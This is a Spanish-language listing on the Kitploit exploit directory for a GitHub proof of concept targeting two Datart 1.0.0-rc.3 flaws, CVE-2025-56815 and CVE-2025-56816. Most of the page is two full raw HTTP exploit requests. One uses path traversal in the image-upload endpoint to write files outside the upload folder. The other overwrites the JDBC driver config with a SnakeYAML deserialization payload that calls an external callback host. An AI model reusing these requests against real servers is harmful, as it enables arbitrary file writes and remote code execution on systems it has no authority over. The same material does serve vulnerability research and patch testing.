Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-56815 — Datart 1.0.0-rc.3 es vulnerable a Directory Traversal en la interfaz POST /viz/image, ya que el servidor utiliza directamente MultipartFile.transferTo() para guardar el archivo subido en una ruta controlable por el usuario y carece de una verificación estricta del nombre de archivo. | Kitploit
Herramientas/GitHubGitHub/xiaoxiaoranxxx/cve-2025-56815
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónMala Configuración
GitHubxiaoxiaoranxxx/cve-2025-56815

CVE-2025-56815

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

5hace 11 mesesAún no revisado

Datart 1.0.0-rc.3 es vulnerable a Directory Traversal en la interfaz POST /viz/image, ya que el servidor utiliza directamente MultipartFile.transferTo() para guardar el archivo subido en una ruta controlable por el usuario y carece de una verificación estricta del nombre de archivo.

Compartir

CVE-2025-56815

Datart 1.0.0-rc.3 es vulnerable a Directory Traversal en la interfaz POST /viz/image, ya que el servidor utiliza directamente MultipartFile.transferTo() para guardar el archivo subido en una ruta controlable por el usuario y carece de una verificación estricta del nombre de archivo.

root@kitploit:~
POST /api/v1/files/viz/image?ownerType=DASHBOARD&ownerId=66822c13a9bc4381923456c11339497e&fileName=../../../../../../../../tmp/1 HTTP/1.1
Host: test.com
Accept-Language: zh-CN
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 4646

------WebKitFormBoundarySInMdoLRiubl32BW
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

xxxxx
------WebKitFormBoundarySInMdoLRiubl32BW--

CVE-2025-56816

Datart 1.0.0-rc. 3 es vulnerable a Directory Traversal. El manejo de archivos de configuración de la aplicación permite a los atacantes subir archivos YAML arbitrarios a la ruta config/jdbc-driver-ext. yml. La aplicación analiza este archivo utilizando el método inseguro load() o loadAs() de SnakeYAML sin saneamiento de entradas. Esto permite la deserialización de contenido YAML controlado por el atacante, lo que conduce a la instanciación arbitraria de clases. Bajo ciertas condiciones, esto puede explotarse para lograr la ejecución remota de código (RCE).

root@kitploit:~
POST /api/v1/files/viz/image?ownerType=DASHBOARD&ownerId=66822c13a9bc4381923456c11339497e&fileName=../../../../../config/jdbc-driver-ext.yml HTTP/1.1
Host: test.com
Accept-Language: zh-CN
Accept: application/json, text/plain, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Length: 4646

------WebKitFormBoundarySInMdoLRiubl32BW
Content-Disposition: form-data; name="file"; filename="1.jpg"
Content-Type: image/jpeg

{!!java.net.URL ["http://test.eyes.sh/"]: 1}
------WebKitFormBoundarySInMdoLRiubl32BW--
Descargar herramienta